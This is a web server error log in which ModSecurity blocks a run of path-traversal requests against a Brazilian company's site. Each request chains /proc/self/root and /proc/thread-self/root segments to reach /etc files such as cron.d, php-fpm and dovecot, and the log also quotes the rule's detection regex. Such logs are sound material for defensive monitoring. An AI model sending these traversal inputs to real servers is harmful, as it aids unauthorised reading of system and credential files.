[Thu Mar 19 04:32:33.787197 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:51966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumkcdf6f5d65gmYZRAJgAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:32:34.786714 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:60784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumkl_V7PWP6ixUYl6I3AAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:36.103426 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:60794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumlAkwaGbbGflqUZCBQgAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:36.155877 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:51976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumlOyqAr6etmhZHNowjQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:32:37.572780 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:60810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumlRkFeYa1D6dYQnC6bAAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:40.006926 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:60814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abummAbLMZ6AikZjR9UqUgAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:42.507311 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:36922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abummhkFeYa1D6dYQnC6bgAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:43.831116 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.243.128:36932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumm1_V7PWP6ixUYl6I3wAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:44.175078 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:43584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumnNa6ubjKNq_cu4YODwAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:32:45.179718 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:36934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumneyqAr6etmhZHNowkgAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:46.477142 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:36940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumngbLMZ6AikZjR9UqVAAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:46.537025 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:43592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumnsdf6f5d65gmYZRALQAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:47.942973 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:36950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumn-yqAr6etmhZHNowkwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:49.412855 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:48282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumoQbLMZ6AikZjR9UqVgAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:50.763917 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:48286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumovu8EFLIOrSqIptqXwAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:52.118016 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:48298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumpMdf6f5d65gmYZRANwAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:56.455264 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:48308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumpwbLMZ6AikZjR9UqYQAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:32:57.969862 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:48318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumqda6ubjKNq_cu4YOHwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:01.251687 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:48332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumrda6ubjKNq_cu4YOKAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:02.744434 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:55976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumrta6ubjKNq_cu4YOLQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:04.057182 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:55988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumsAbLMZ6AikZjR9UqaAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:05.301630 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:55990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abumsda6ubjKNq_cu4YOMQAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:33:05.906162 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.241.31:33476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 